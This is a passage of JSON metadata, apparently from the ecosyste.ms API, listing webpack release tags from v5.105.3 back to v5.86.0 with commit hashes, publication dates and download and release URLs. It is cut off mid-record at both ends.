ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86